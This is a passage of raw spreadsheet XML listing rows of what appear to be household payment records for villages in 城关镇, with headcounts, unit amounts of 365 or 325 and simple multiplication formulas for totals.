        <v>318</v>
      </c>
      <c r="D138" s="17" t="s">
        <v>580</v>
      </c>
      <c r="E138" s="17" t="s">
        <v>581</v>
      </c>
      <c r="F138" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G138" s="17">
        <v>1</v>
      </c>
      <c r="H138" s="18">
        <v>365</v>
      </c>
      <c r="I138" s="17">
        <f>H138*G138</f>
        <v>365</v>
      </c>
      <c r="J138" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K138" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="139" customHeight="1" spans="1:22">
      <c r="A139" s="16" t="s">
        <v>582</v>
      </c>
      <c r="B139" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C139" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D139" s="17" t="s">
        <v>583</v>
      </c>
      <c r="E139" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F139" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G139" s="17">
        <v>2</v>
      </c>
      <c r="H139" s="18">
        <v>325</v>
      </c>
      <c r="I139" s="17">
        <f>H139*G139</f>
        <v>650</v>
      </c>
      <c r="J139" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K139" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="140" customHeight="1" spans="1:22">
      <c r="A140" s="16" t="s">
        <v>585</v>
      </c>
      <c r="B140" s="17" t="str">
        <f>B139</f>
        <v>城关镇</v>
      </c>
      <c r="C140" s="17" t="str">
        <f>C139</f>
        <v>西北村</v>
      </c>
      <c r="D140" s="16" t="s">
        <v>586</v>
      </c>
      <c r="E140" s="16" t="s">
        <v>416</v>
      </c>
      <c r="F140" s="17" t="str">
        <f>F139</f>
        <v>4113210106</v>
      </c>
      <c r="G140" s="17"/>
      <c r="H140" s="17"/>
      <c r="I140" s="17"/>
      <c r="J140" s="17"/>
      <c r="K140" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L140" s="1"/>
    </row>
    <row r="141" customHeight="1" spans="1:22">
      <c r="A141" s="16" t="s">
        <v>587</v>
      </c>
      <c r="B141" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C141" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D141" s="17" t="s">
        <v>588</v>
      </c>
      <c r="E141" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F141" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G141" s="17">
        <v>2</v>
      </c>
      <c r="H141" s="18">
        <v>325</v>
      </c>
      <c r="I141" s="17">
        <f>H141*G141</f>
        <v>650</v>
      </c>
      <c r="J141" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K141" s="17" t="s">
        <v>225</v>
      </c>
      <c r="M141" s="1"/>
      <c r="N141" s="1"/>
      <c r="O141" s="1"/>
      <c r="P141" s="1"/>
      <c r="Q141" s="1"/>
      <c r="R141" s="1"/>
      <c r="S141" s="1"/>
      <c r="T141" s="1"/>
      <c r="U141" s="1"/>
      <c r="V141" s="1"/>
    </row>
    <row r="142" s="1" customFormat="1" customHeight="1" spans="1:22">
      <c r="A142" s="16" t="s">
        <v>589</v>
      </c>
      <c r="B142" s="20" t="s">
        <v>219</v>
      </c>
      <c r="C142" s="20" t="s">
        <v>263</v>
      </c>
      <c r="D142" s="20" t="s">
        <v>590</v>
      </c>
      <c r="E142" s="20" t="s">
        <v>591</v>
      </c>
      <c r="F142" s="20" t="s">
        <v>266</v>
      </c>
      <c r="G142" s="21"/>
      <c r="H142" s="21"/>
      <c r="I142" s="20"/>
      <c r="J142" s="22" t="s">
        <v>592</v>
      </c>
      <c r="K142" s="17" t="s">
        <v>225</v>
      </c>
      <c r="L142" s="6"/>
      <c r="M142" s="6"/>
      <c r="N142" s="6"/>
      <c r="O142" s="6"/>
      <c r="P142" s="6"/>
      <c r="Q142" s="6"/>
      <c r="R142" s="6"/>
      <c r="S142" s="6"/>
      <c r="T142" s="6"/>
      <c r="U142" s="6"/>
      <c r="V142" s="6"/>
    </row>
    <row r="143" customHeight="1" spans="1:22">
      <c r="A143" s="16" t="s">
        <v>593</v>
      </c>
      <c r="B143" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C143" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D143" s="17" t="s">
        <v>594</v>
      </c>
      <c r="E143" s="17" t="s">
        <v>595</v>
      </c>
      <c r="F143" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G143" s="17">
        <v>1</v>
      </c>
      <c r="H143" s="18">
        <v>365</v>
      </c>
      <c r="I143" s="17">
        <f>H143*G143</f>
        <v>365</v>
      </c>
      <c r="J143" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K143" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="144" customHeight="1" spans="1:22">
      <c r="A144" s="16" t="s">
        <v>596</v>
      </c>
      <c r="B144" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C144" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D144" s="17" t="s">
        <v>597</v>
      </c>
      <c r="E144" s="17" t="s">
        <v>258</v>
      </c>
      <c r="F144" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G144" s="17">
        <v>1</v>
      </c>
      <c r="H144" s="18">
        <v>365</v>
      </c>
      <c r="I144" s="17">
        <f>H144*G144</f>
        <v>365</v>
      </c>
      <c r="J144" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K144" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="145" customHeight="1" spans="1:11">
      <c r="A145" s="16" t="s">
        <v>598</v>
      </c>
      <c r="B145" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C145" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D145" s="17" t="s">
        <v>437</v>
      </c>
      <c r="E145" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F145" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G145" s="17">
        <v>1</v>
      </c>
      <c r="H145" s="18">
        <v>365</v>
      </c>
      <c r="I145" s="17">
        <f>H145*G145</f>
        <v>365</v>
      </c>
      <c r="J145" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K145" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="146" customHeight="1" spans="1:11">
      <c r="A146" s="16" t="s">
        <v>599</v>
      </c>
      <c r="B146" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C146" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D146" s="17" t="s">
        <v>600</v>
      </c>
      <c r="E146" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F146" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G146" s="17">
        <v>2</v>
      </c>
      <c r="H146" s="18">
        <v>325</v>
      </c>
      <c r="I146" s="17">
        <f>H146*G146</f>
        <v>650</v>
      </c>
      <c r="J146" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K146" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="147" customHeight="1" spans="1:11">
      <c r="A147" s="16" t="s">
        <v>601</v>
      </c>
      <c r="B147" s="17" t="str">
        <f>B146</f>
        <v>城关镇</v>
      </c>
      <c r="C147" s="17" t="str">
        <f>C146</f>
        <v>西北村</v>
      </c>
      <c r="D147" s="16" t="s">
        <v>602</v>
      </c>
      <c r="E147" s="16" t="s">
        <v>603</v>
      </c>
      <c r="F147" s="17" t="str">
        <f>F146</f>
        <v>4113210106</v>
      </c>
      <c r="G147" s="17"/>
      <c r="H147" s="17"/>
      <c r="I147" s="17"/>
      <c r="J147" s="17"/>
      <c r="K147" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="148" customHeight="1" spans="1:11">
      <c r="A148" s="16" t="s">
        <v>604</v>
      </c>
      <c r="B148" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C148" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D148" s="17" t="s">
        <v>605</v>
      </c>
      <c r="E148" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F148" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G148" s="17">
        <v>2</v>
      </c>
      <c r="H148" s="18">
        <v>325</v>
      </c>
      <c r="I148" s="17">
        <f>H148*G148</f>
        <v>650</v>
      </c>
      <c r="J148" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K148" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="149" customHeight="1" spans="1:11">
      <c r="A149" s="16" t="s">
        <v>606</v>
      </c>
      <c r="B149" s="17" t="str">
        <f>B148</f>
        <v>城关镇</v>
      </c>
      <c r="C149" s="17" t="str">
        <f>C148</f>
        <v>中华村</v>
      </c>
      <c r="D149" s="16" t="s">
        <v>607</v>
      </c>
      <c r="E149" s="16" t="s">
        <v>581</v>
      </c>
      <c r="F149" s="17" t="str">
        <f>F148</f>
        <v>4113210108</v>
      </c>
      <c r="G149" s="17"/>
      <c r="H149" s="17"/>
      <c r="I149" s="17"/>
      <c r="J149" s="17"/>
      <c r="K149" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="150" customHeight="1" spans="1:11">
      <c r="A150" s="16" t="s">
        <v>608</v>
      </c>
      <c r="B150" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C150" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D150" s="17" t="s">
        <v>609</v>
      </c>
      <c r="E150" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F150" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G150" s="17">
        <v>1</v>
      </c>
      <c r="H150" s="18">
        <v>365</v>
      </c>
      <c r="I150" s="17">
        <f>H150*G150</f>
        <v>365</v>
      </c>
      <c r="J150" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K150" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="151" customHeight="1" spans="1:11">
      <c r="A151" s="16" t="s">
        <v>610</v>
      </c>
      <c r="B151" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C151" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D151" s="17" t="s">
        <v>611</v>
      </c>
      <c r="E151" s="17" t="s">
        <v>612</v>
      </c>
      <c r="F151" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G151" s="17">
        <v>2</v>
      </c>
      <c r="H151" s="18">
        <v>325</v>
      </c>
      <c r="I151" s="17">
        <f>H151*G151</f>
        <v>650</v>
      </c>
      <c r="J151" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K151" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="152" customHeight="1" spans="1:11">
      <c r="A152" s="16" t="s">
        <v>613</v>
      </c>
      <c r="B152" s="17" t="str">
        <f>B151</f>
        <v>城关镇</v>
      </c>
      <c r="C152" s="17" t="str">
        <f>C151</f>
        <v>西北村</v>
      </c>
      <c r="D152" s="16" t="s">
        <v>614</v>
      </c>
      <c r="E152" s="16" t="s">
        <v>402</v>
      </c>
      <c r="F152" s="17" t="str">
        <f>F151</f>
        <v>4113210106</v>
      </c>
      <c r="G152" s="17"/>
      <c r="H152" s="17"/>
      <c r="I152" s="17"/>
      <c r="J152" s="17"/>
      <c r="K152" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="153" customHeight="1" spans="1:11">
      <c r="A153" s="16" t="s">
        <v>615</v>
      </c>
      <c r="B153" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C153" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D153" s="17" t="s">
        <v>616</v>
      </c>
      <c r="E153" s="17" t="s">
        <v>617</v>
      </c>
      <c r="F153" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G153" s="17">
        <v>2</v>
      </c>
      <c r="H153" s="18">
        <v>325</v>
      </c>
      <c r="I153" s="17">
        <f>H153*G153</f>
        <v>650</v>
      </c>
      <c r="J153" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K153" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="154" customHeight="1" spans="1:11">
      <c r="A154" s="16" t="s">
        <v>618</v>
      </c>
      <c r="B154" s="17" t="str">
        <f>B153</f>
        <v>城关镇</v>
      </c>
      <c r="C154" s="17" t="str">
        <f>C153</f>
        <v>东北六组</v>
      </c>
      <c r="D154" s="16" t="s">
        <v>619</v>
      </c>
      <c r="E154" s="16" t="s">
        <v>239</v>
      </c>
      <c r="F154" s="17" t="str">
        <f>F153</f>
        <v>4113210103</v>
      </c>
      <c r="G154" s="17"/>
      <c r="H154" s="17"/>
      <c r="I154" s="17"/>
      <c r="J154" s="17"/>
      <c r="K154" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="155" customHeight="1" spans="1:11">
      <c r="A155" s="16" t="s">
        <v>620</v>
      </c>
      <c r="B155" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C155" s="17" t="s">
        <v>271</v>
      </c>
      <c r="D155" s="17" t="s">
        <v>621</v>
      </c>
      <c r="E155" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F155" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G155" s="17">
        <v>1</v>
      </c>
      <c r="H155" s="18">
        <v>365</v>
      </c>
      <c r="I155" s="17">
        <f t="shared" ref="I155:I160" si="5">H155*G155</f>
        <v>365</v>
      </c>
      <c r="J155" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K155" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="156" customHeight="1" spans="1:11">
      <c r="A156" s="16" t="s">
        <v>622</v>
      </c>
      <c r="B156" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C156" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D156" s="17" t="s">
        <v>623</v>
      </c>
      <c r="E156" s="17" t="s">
        <v>408</v>
      </c>
      <c r="F156" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G156" s="17">
        <v>1</v>
      </c>
      <c r="H156" s="18">
        <v>365</v>
      </c>
      <c r="I156" s="17">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J156" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K156" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="157" customHeight="1" spans="1:11">
      <c r="A157" s="16" t="s">
        <v>624</v>
      </c>
      <c r="B157" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C157" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D157" s="17" t="s">
        <v>625</v>
      </c>
      <c r="E157" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F157" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G157" s="17">
        <v>1</v>
      </c>
      <c r="H157" s="18">
        <v>365</v>
      </c>
      <c r="I157" s="17">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J157" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K157" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="158" customHeight="1" spans="1:11">
      <c r="A158" s="16" t="s">
        <v>626</v>
      </c>
      <c r="B158" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C158" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D158" s="17" t="s">
        <v>627</v>
      </c>
      <c r="E158" s="17" t="s">
        <v>617</v>
      </c>
      <c r="F158" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G158" s="17">
        <v>1</v>
      </c>
      <c r="H158" s="18">
        <v>365</v>
      </c>
      <c r="I158" s="17">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J158" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K158" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="159" customHeight="1" spans="1:11">
      <c r="A159" s="16" t="s">
        <v>628</v>
      </c>
      <c r="B159" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C159" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D159" s="17" t="s">
        <v>629</v>
      </c>
      <c r="E159" s="17" t="s">
        <v>630</v>
      </c>
      <c r="F159" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G159" s="17">
        <v>1</v>
      </c>
      <c r="H159" s="18">
        <v>365</v>
      </c>
      <c r="I159" s="17">
        <f t="shared" si="5"/>
        <v>365</v>
      </c>
      <c r="J159" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K159" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="160" customHeight="1" spans="1:11">
      <c r="A160" s="16" t="s">
        <v>631</v>
      </c>
      <c r="B160" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C160" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D160" s="17" t="s">
        <v>632</v>
      </c>
      <c r="E160" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F160" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G160" s="17">
        <v>2</v>
      </c>
      <c r="H160" s="18">
        <v>325</v>
      </c>
      <c r="I160" s="17">
        <f t="shared" si="5"/>
        <v>650</v>
      </c>
      <c r="J160" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K160" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="161" customHeight="1" spans="1:11">
      <c r="A161" s="16" t="s">
        <v>634</v>
      </c>
      <c r="B161" s="17" t="str">
        <f>B160</f>
        <v>城关镇</v>
      </c>
      <c r="C161" s="17" t="str">
        <f>C160</f>
        <v>东北一组</v>
      </c>
      <c r="D161" s="16" t="s">
        <v>635</v>
      </c>
      <c r="E161" s="16" t="s">
        <v>578</v>
      </c>
      <c r="F161" s="17" t="str">
        <f>F160</f>
        <v>4113210103</v>
      </c>
      <c r="G161" s="17"/>
      <c r="H161" s="17"/>
      <c r="I161" s="17"/>
      <c r="J161" s="17"/>
      <c r="K161" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="162" customHeight="1" spans="1:11">
      <c r="A162" s="16" t="s">
        <v>636</v>
      </c>
      <c r="B162" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C162" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D162" s="17" t="s">
        <v>637</v>
      </c>
      <c r="E162" s="17" t="s">
        <v>638</v>
      </c>
      <c r="F162" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G162" s="17">
        <v>1</v>
      </c>
      <c r="H162" s="18">
        <v>365</v>
      </c>
      <c r="I162" s="17">
        <f>H162*G162</f>
        <v>365</v>
      </c>
      <c r="J162" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K162" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="163" customHeight="1" spans="1:11">
      <c r="A163" s="16" t="s">
        <v>639</v>
      </c>
      <c r="B163" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C163" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D163" s="17" t="s">
        <v>640</v>
      </c>
      <c r="E163" s="17" t="s">
        <v>641</v>
      </c>
      <c r="F163" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G163" s="17">
        <v>1</v>
      </c>
      <c r="H163" s="18">
        <v>365</v>
      </c>
      <c r="I163" s="17">
        <f>H163*G163</f>
        <v>365</v>
      </c>
      <c r="J163" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K163" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="164" customHeight="1" spans="1:11">
      <c r="A164" s="16" t="s">
        <v>642</v>
      </c>
      <c r="B164" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C164" s="17" t="s">
        <v>643</v>
      </c>
      <c r="D164" s="17" t="s">
        <v>644</v>
      </c>
      <c r="E164" s="17" t="s">
        <v>645</v>
      </c>
      <c r="F164" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G164" s="17">
        <v>1</v>
      </c>
      <c r="H164" s="18">
        <v>365</v>
      </c>
      <c r="I164" s="17">
        <f>H164*G164</f>
        <v>365</v>
      </c>
      <c r="J164" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K164" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="165" customHeight="1" spans="1:11">
      <c r="A165" s="16" t="s">
        <v>646</v>
      </c>
      <c r="B165" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C165" s="17" t="s">
        <v>318</v>
      </c>
      <c r="D165" s="17" t="s">
        <v>647</v>
      </c>
      <c r="E165" s="17" t="s">
        <v>545</v>
      </c>
      <c r="F165" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G165" s="17">
        <v>1</v>
      </c>
      <c r="H165" s="18">
        <v>365</v>
      </c>
      <c r="I165" s="17">
        <f>H165*G165</f>
        <v>365</v>
      </c>
      <c r="J165" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K165" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="166" customHeight="1" spans="1:11">
      <c r="A166" s="16" t="s">
        <v>648</v>
      </c>
      <c r="B166" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C166" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D166" s="17" t="s">
        <v>649</v>
      </c>
      <c r="E166" s="17" t="s">
        <v>563</v>
      </c>
      <c r="F166" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G166" s="17">
        <v>2</v>
      </c>
      <c r="H166" s="18">
        <v>325</v>
      </c>
      <c r="I166" s="17">
        <f>H166*G166</f>
        <v>650</v>
      </c>
      <c r="J166" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K166" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="167" customHeight="1" spans="1:11">
      <c r="A167" s="16" t="s">
        <v>650</v>
      </c>
      <c r="B167" s="17" t="str">
        <f>B166</f>
        <v>城关镇</v>
      </c>
      <c r="C167" s="17" t="str">
        <f>C166</f>
        <v>西北村</v>
      </c>
      <c r="D167" s="23" t="s">
        <v>651</v>
      </c>
      <c r="E167" s="24" t="s">
        <v>652</v>
      </c>
      <c r="F167" s="17" t="str">
        <f>F166</f>
        <v>4113210106</v>
      </c>
      <c r="G167" s="17"/>
      <c r="H167" s="17"/>
      <c r="I167" s="17"/>
      <c r="J167" s="17"/>
      <c r="K167" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="168" customHeight="1" spans="1:11">
      <c r="A168" s="16" t="s">
        <v>653</v>
      </c>
      <c r="B168" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C168" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D168" s="17" t="s">
        <v>654</v>
      </c>
      <c r="E168" s="17" t="s">
        <v>331</v>
      </c>
      <c r="F168" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G168" s="17">
        <v>1</v>
      </c>
      <c r="H168" s="18">
        <v>365</v>
      </c>
      <c r="I168" s="17">
        <f t="shared" ref="I168:I181" si="6">H168*G168</f>
        <v>365</v>
      </c>
      <c r="J168" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K168" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="169" customHeight="1" spans="1:11">
      <c r="A169" s="16" t="s">
        <v>655</v>
      </c>
      <c r="B169" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C169" s="17" t="s">
        <v>263</v>
      </c>
      <c r="D169" s="17" t="s">
        <v>656</v>
      </c>
      <c r="E169" s="17" t="s">
        <v>273</v>
      </c>
      <c r="F169" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G169" s="17">
        <v>1</v>
      </c>
      <c r="H169" s="18">
        <v>365</v>
      </c>
      <c r="I169" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J169" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K169" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="170" customHeight="1" spans="1:11">
      <c r="A170" s="16" t="s">
        <v>657</v>
      </c>
      <c r="B170" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C170" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D170" s="17" t="s">
        <v>658</v>
      </c>
      <c r="E170" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F170" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G170" s="17">
        <v>1</v>
      </c>
      <c r="H170" s="18">
        <v>365</v>
      </c>
      <c r="I170" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J170" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K170" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="171" customHeight="1" spans="1:11">
      <c r="A171" s="16" t="s">
        <v>659</v>
      </c>
      <c r="B171" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C171" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D171" s="17" t="s">
        <v>660</v>
      </c>
      <c r="E171" s="17" t="s">
        <v>661</v>
      </c>
      <c r="F171" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G171" s="17">
        <v>1</v>
      </c>
      <c r="H171" s="18">
        <v>365</v>
      </c>
      <c r="I171" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J171" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K171" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="172" customHeight="1" spans="1:11">
      <c r="A172" s="16" t="s">
        <v>662</v>
      </c>
      <c r="B172" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C172" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D172" s="17" t="s">
        <v>663</v>
      </c>
      <c r="E172" s="17" t="s">
        <v>306</v>
      </c>
      <c r="F172" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G172" s="17">
        <v>1</v>
      </c>
      <c r="H172" s="18">
        <v>365</v>
      </c>
      <c r="I172" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J172" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K172" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="173" customHeight="1" spans="1:11">
      <c r="A173" s="16" t="s">
        <v>664</v>
      </c>
      <c r="B173" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C173" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D173" s="17" t="s">
        <v>665</v>
      </c>
      <c r="E173" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F173" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G173" s="17">
        <v>1</v>
      </c>
      <c r="H173" s="18">
        <v>365</v>
      </c>
      <c r="I173" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J173" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K173" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="174" customHeight="1" spans="1:11">
      <c r="A174" s="16" t="s">
        <v>666</v>
      </c>
      <c r="B174" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C174" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D174" s="17" t="s">
        <v>667</v>
      </c>
      <c r="E174" s="17" t="s">
        <v>668</v>
      </c>
      <c r="F174" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G174" s="17">
        <v>1</v>
      </c>
      <c r="H174" s="18">
        <v>365</v>
      </c>
      <c r="I174" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J174" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K174" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="175" customHeight="1" spans="1:11">
      <c r="A175" s="16" t="s">
        <v>669</v>
      </c>
      <c r="B175" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C175" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D175" s="17" t="s">
        <v>670</v>
      </c>
      <c r="E175" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F175" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G175" s="17">
        <v>1</v>
      </c>
      <c r="H175" s="18">
        <v>365</v>
      </c>
      <c r="I175" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J175" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K175" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="176" customHeight="1" spans="1:11">
      <c r="A176" s="16" t="s">
        <v>671</v>
      </c>
      <c r="B176" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C176" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D176" s="17" t="s">
        <v>672</v>
      </c>
      <c r="E176" s="17" t="s">
        <v>542</v>
      </c>
      <c r="F176" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G176" s="17">
        <v>1</v>
      </c>
      <c r="H176" s="18">
        <v>365</v>
      </c>
      <c r="I176" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J176" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K176" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="177" customHeight="1" spans="1:11">
      <c r="A177" s="16" t="s">
        <v>673</v>
      </c>
      <c r="B177" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C177" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D177" s="17" t="s">
        <v>674</v>
      </c>
      <c r="E177" s="17" t="s">
        <v>675</v>
      </c>
      <c r="F177" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G177" s="17">
        <v>1</v>
      </c>
      <c r="H177" s="18">
        <v>365</v>
      </c>
      <c r="I177" s="17">
        <f t="shared" si="6"/>
        <v>365</v>
      </c>
      <c r="J177" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K177" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="178" customHeight="1" spans="1:11">
      <c r="A178" s="16" t="s">
        <v>676</v>
      </c>
      <c r="B178" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C178" s="17" t="s">
        <v>286</v>
      </c>
      <c r="D178" s="17" t="s">
        <v>677</v>
      </c>
      <c r="E178" s="17" t="s">
        <v>678</v>
